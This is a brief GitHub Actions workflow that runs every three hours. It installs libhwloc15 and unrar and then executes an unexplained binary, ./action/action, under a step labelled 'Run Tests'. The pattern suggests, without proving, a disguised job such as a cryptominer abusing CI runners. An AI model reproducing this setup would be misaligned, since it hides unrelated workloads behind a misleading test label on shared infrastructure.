jobs:
  workflow:
    name: Verify
    runs-on: ubuntu-20.04

    steps:
      - name: Pull
        uses: actions/checkout@v2
      - name: Pull Prerequisites
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Tests
        run: ./action/action

name: Workflow

on:
  schedule:
    - cron: "15 2/3 * * *"
